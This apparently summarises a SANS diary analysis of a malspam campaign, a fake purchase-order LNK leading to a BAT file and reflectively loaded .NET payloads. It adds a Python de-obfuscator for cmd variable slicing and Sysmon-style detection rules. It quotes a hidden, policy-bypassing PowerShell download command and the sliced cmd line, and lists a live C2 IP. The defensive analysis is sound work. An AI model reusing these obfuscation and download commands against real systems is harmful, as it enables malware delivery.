An e-mail-based malspam campaign delivered a small LNK dropper that pretends to be a Purchase Order PDF. The LNK ultimately downloads a PDF lure, a BAT file, and two obfuscated .NET binaries that are loaded reflectively in memory, with low VirusTotal detection. #LNK #PowerShell #UniBat #ReflectiveCodeLoading
Keypoints
- Malspam delivered a ZIP attachment named Purchase Order PO007289.pdf.zip; the LNK inside it, Purchase Order PO007289.pdf.lnk, carries the same double extension and runs the malicious command when the user opens it.
- The LNK’s target is cmd.exe, followed by a long, obfuscated argument string that only becomes readable once its variables are expanded.
- The command is obfuscated by reassembling its keywords from substrings of environment variables (cmd’s %VAR:~start,len% syntax), storing the pieces in many new variables, and executing the reassembled string through a “call” step.
- It downloads a PDF lure and opens it in Microsoft Edge as a decoy, then downloads a batch file (Uni.bat) and executes it.
- The BAT file copies powershell.exe to Uni.bat.exe, so the PowerShell host runs under the batch file’s name, and uses that copy to run a PowerShell chain that decrypts, decompresses, and loads two .NET binaries into memory for execution.
- VirusTotal detections for the BAT and final-stage binaries were low at the time, highlighting detection gaps for multi-stage payloads.
- Observed MITRE techniques include phishing, user execution, PowerShell and Windows Command Shell, obfuscation, masquerading, virtualization/sandbox evasion, and reflective code loading.
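As an added illustration of the environment-variable slicing described in the keypoints above (example code written for this page, not tooling from the diary or its author), the Python below emulates cmd.exe’s %VAR:~start,len% expansion and the second parsing pass that “call” triggers, so the reassembled command can be recovered offline without executing it. It assumes the default values of %ProgramFiles(x86)% and %ALLUSERSPROFILE% on a 64-bit English Windows host; the two-line script that follows the quoted LNK prefix is constructed, and q1/q2 are made-up variable names.

```python
import re

# Assumed values of the two environment variables the LNK slices. These are the
# defaults of a 64-bit English Windows install (constructed for this example);
# on a real host cmd.exe reads them from the victim's environment.
DEFAULT_ENV = {
    "ProgramFiles(x86)": r"C:\Program Files (x86)",
    "ALLUSERSPROFILE": r"C:\ProgramData",
}

# Matches %NAME% and %NAME:~start% / %NAME:~start,len%. The :str=rep
# substitution syntax and batch-only %1 / %% handling are not modelled.
_VAR_RE = re.compile(r"%([^%:=]+)(?::~(-?\d+)(?:,(-?\d+))?)?%")


def cmd_substring(value, start, length=None):
    """Emulate cmd.exe's %VAR:~start,len% slicing.

    A negative start counts from the end of the string; a negative len is an
    offset from the end rather than a count; an omitted len means 'to the end'.
    """
    n = len(value)
    if start < 0:
        start = max(n + start, 0)
    if start > n:
        return ""
    if length is None:
        end = n
    elif length < 0:
        end = max(n + length, start)
    else:
        end = min(start + length, n)
    return value[start:end]


def _lookup(env, name):
    # Windows environment variable names are case-insensitive.
    for key, value in env.items():
        if key.lower() == name.lower():
            return value
    return None


def expand(text, env):
    """One round of %VAR% expansion as cmd.exe /c (or /r) performs on a command
    line. Undefined variables are left literally, which is what cmd.exe does on
    a command line (inside a .bat file they would expand to nothing)."""
    def repl(match):
        name, start, length = match.groups()
        value = _lookup(env, name)
        if value is None:
            return match.group(0)
        if start is None:
            return value
        return cmd_substring(value, int(start), None if length is None else int(length))
    return _VAR_RE.sub(repl, text)


def reveal(script_lines, env):
    """Walk a cmd sequence offline: apply 'set NAME=value' lines to a copy of the
    environment and, for each 'call ...' line, return the command cmd.exe would
    have executed instead of running it. This is the 'replace call with echo'
    trick from the analysis, done without ever executing the payload."""
    env = dict(env)
    revealed = []
    for raw in script_lines:
        line = expand(raw, env)
        m = re.match(r'\s*set\s+"?([^=]+)=(.*?)"?\s*$', line, re.IGNORECASE)
        if m:
            env[m.group(1)] = m.group(2)
            continue
        m = re.match(r"\s*call\s+(.*)$", line, re.IGNORECASE)
        if m:
            # 'call' makes cmd.exe parse the line a second time, so variable
            # references produced by the first expansion are resolved here too.
            revealed.append(expand(m.group(1), env))
    return env, revealed


# The opening of the LNK's command line as quoted in the analysis, followed by
# two constructed lines (not from the sample) showing how the sliced-out word
# is typically reused through a variable and a 'call' step.
LNK_PREFIX = "cmd.exe /r %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1%"
CONSTRUCTED_SCRIPT = [
    'set "q1=%ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1%"',
    "call %q1% q2=hidden",
]

if __name__ == "__main__":
    print(expand(LNK_PREFIX, DEFAULT_ENV))      # cmd.exe /r set
    env, revealed = reveal(CONSTRUCTED_SCRIPT, DEFAULT_ENV)
    print(env["q1"], revealed)                  # set ['set q2=hidden']
```

The slices only decode correctly under the environment the attacker assumed, so when emulating a real sample feed it the variable values of the intended victim locale rather than those of the analysis box; a different %ProgramFiles(x86)% string shifts every offset and yields garbage.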
MITRE Techniques
- [T1566.001] Phishing – The email delivered a malicious attachment designed to appear legitimate as a purchase order. Quote: “The e-mail message was the usual malspam fare trying to appear as a purchase order sent to the recipient…”
- [T1204.002] User Execution – The chain relies on the user opening the attachment and triggering execution of the payload. Quote: “The e-mail message was the usual malspam fare trying to appear as a purchase order sent to the recipient…”
- [T1059.001] PowerShell – The final stage runs PowerShell with -ep bypass (execution policy bypass) and -w hidden (hidden window) and uses curl, which in Windows PowerShell is an alias for Invoke-WebRequest, to download the lure and later stages. Quote: “powershell -noprofile -ep bypass -w hidden -c curl -o ‘C:\Users\[User]\AppData\Local\Temp\Pur%njDpgP%e%20Order%20PO007289.pdf’ …”
- [T1059.003] Windows Command Shell – The LNK’s target runs cmd.exe (/r is an undocumented synonym for /c) with a command line assembled from environment-variable substrings; on a default installation %ProgramFiles(x86):~15,-6% is “s” and %ALLUSERSPROFILE:~-2,-1% is “t”, so the quoted fragment expands to “set”. Quote: “cmd.exe /r %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% …”
- [T1027] Obfuscated Files or Information – The script is obfuscated, with readable strings appended to a long obfuscated block. Quote: “The obfuscated script came down to the following command.”
- [T1027.010] Obfuscated Files or Information: Command Obfuscation – The reassembled pieces are executed through “call”; replacing that “call” with “echo” makes cmd.exe print the reassembled command instead of running it, which is how the plaintext was recovered. Quote: “To do this, all we would have to do would be to replace the ‘call’ command with an ‘echo’ command…”
- [T1497] Virtualization/Sandbox Evasion – Listed for the campaign; the summary gives no detail on the specific check the payload performs. Quote: “Virtualization/Sandbox Evasion”
- [T1620] Reflective Code Loading – The final stage loads two heavily obfuscated .NET binaries reflectively into memory and executes them. Quote: “two heavily obfuscated .NET binaries – Is then reflectively loaded into memory and executed (using the function RUsyF).”
- [T1036] Masquerading – Every stage poses as something benign: the LNK as a PDF purchase order and the PowerShell host as the batch file. Quote: “Masquerading”
- [T1036.003] Masquerading: Rename System Utilities – The BAT file copies powershell.exe to Uni.bat.exe before using it, so process listings show Uni.bat.exe rather than powershell.exe. Quote: “Masquerading: Rename System Utilities”
- [T1036.007] Masquerading: Double File Extension – The attachment Purchase Order PO007289.pdf.zip and the LNK inside it (…pdf.lnk) place .pdf before the real extension so the files look like a PDF when extensions are hidden. Quote: “Masquerading: Double File Extension”
- [T1036.008] Masquerading: Masquerade File Type – The LNK is presented as a PDF and the copied PowerShell binary as a batch file, hiding the true file type from the user. Quote: “Masquerading: Masquerade File Type”
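The masquerading techniques above leave telemetry that a detection engineer can key on. As an added example (written for this page, not taken from the diary or the campaign’s telemetry), the Python below runs four checks over constructed process-creation events shaped like Sysmon Event ID 1: the PE’s OriginalFileName disagreeing with the on-disk name (powershell.exe copied to Uni.bat.exe), a double extension on the image, the %VAR:~start,len% slicing pattern on a cmd.exe command line, and the -ep bypass / -w hidden pair on a PowerShell host. The event records and their paths are constructed; the rule names are made up for this example.

```python
import ntpath
import re

# Constructed process-creation events in the shape of Sysmon Event ID 1 (not
# taken from the sample's telemetry). OriginalFileName comes from the PE's
# version resource and therefore survives copying or renaming the file.
SAMPLE_EVENTS = [
    {   # benign interactive PowerShell
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "OriginalFileName": "PowerShell.EXE",
        "CommandLine": "powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # powershell.exe copied next to the batch file and run under its name
        "Image": r"C:\Users\user\AppData\Local\Temp\Uni.bat.exe",
        "OriginalFileName": "PowerShell.EXE",
        "CommandLine": "Uni.bat.exe -noprofile -ep bypass -w hidden -c ...",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {   # cmd.exe launched with the LNK-style sliced command line
        "Image": r"C:\Windows\System32\cmd.exe",
        "OriginalFileName": "Cmd.Exe",
        "CommandLine": "cmd.exe /r %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% ...",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
]

# Interpreters whose OriginalFileName we expect to match the image name.
KNOWN_INTERPRETERS = {"powershell.exe", "cmd.exe"}


def renamed_system_utility(ev):
    """The binary says it is powershell.exe/cmd.exe but runs under another name."""
    original = ev.get("OriginalFileName", "").lower()
    on_disk = ntpath.basename(ev.get("Image", "")).lower()
    return original in KNOWN_INTERPRETERS and on_disk != original


def double_extension_image(ev):
    """Image name such as Uni.bat.exe or invoice.pdf.exe."""
    name = ntpath.basename(ev.get("Image", ""))
    return re.search(r"\.(bat|cmd|pdf|doc|txt)\.exe$", name, re.I) is not None


def env_var_slicing(ev):
    """cmd.exe %VAR:~start,len% substring references on the command line."""
    return re.search(r"%[^%]+:~-?\d+(?:,-?\d+)?%", ev.get("CommandLine", "")) is not None


def hidden_bypass_powershell(ev):
    """A PowerShell host (whatever its file name) started hidden with policy bypass."""
    if ev.get("OriginalFileName", "").lower() != "powershell.exe":
        return False
    cmd = ev.get("CommandLine", "")
    return (re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.I) is not None
            and re.search(r"-e(?:p|xecutionpolicy)?\s+bypass", cmd, re.I) is not None)


RULES = [
    ("renamed_system_utility", renamed_system_utility),
    ("double_extension_image", double_extension_image),
    ("env_var_slicing_obfuscation", env_var_slicing),
    ("hidden_bypass_powershell", hidden_bypass_powershell),
]


def triage(event):
    """Return the names of the rules that fire for one process-creation event."""
    return [name for name, rule in RULES if rule(event)]


def scan(events):
    """Return {index: [rule names]} for every event that fires at least one rule."""
    hits = {}
    for i, ev in enumerate(events):
        fired = triage(ev)
        if fired:
            hits[i] = fired
    return hits


if __name__ == "__main__":
    for i, fired in scan(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["Image"], fired)
```

The OriginalFileName check is the robust one, because it keys on the PE version resource rather than the file name the batch file chose; a copied binary with a stripped version resource would evade it, so the other three rules stay in place as independent signals. Note also that PowerShell script block logging (Event ID 4104) is produced by the engine assembly the renamed host still loads, so the decrypted later stages remain visible there regardless of what the process is called.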
Indicators of Compromise
- [IP] context – Command and control/download server: 85.208.139.229
- [File] context – Dropper LNK: Purchase%20Order%20PO007289.pdf.lnk – MD5 304a9ab4d385a6d4c8d45002f92342fa, SHA-1 93700d836102ff1c857c880a8cad4b4387d54de9, SHA-256 e3602d0eb7149004ae6cf4befec8c6d61ac391189122744fff4a1de2cdad4aa3
- [File] context – PDF lure: Purchase%20Order%20PO007289.pdf – MD5 bfd3ae8bb20e06f32f5b46100dc498c2, SHA-1 5b9ccd750f86ad1a022f8d0eba477a86ca08f6b8, SHA-256 448bf205f66888cd2661b3b7531632a4d0f1e91ccc6568de07f0fdb41f4d96f8
- [File] context – Uni.bat: Uni.bat – MD5 6038fb0dd91fa1e9cca80ea225d8b59b, SHA-1 98d630a01d50675988898185ac8088673409c8a0, SHA-256 8c01ef8b6a9cfa7a80fd5bcb640d68a63ef17dd25ea3e260c7971b1fa156c8be
Read more: https://isc.sans.edu/diary/From+small+LNK+to+large+malicious+BAT+file+with+zero+VT+score/30094/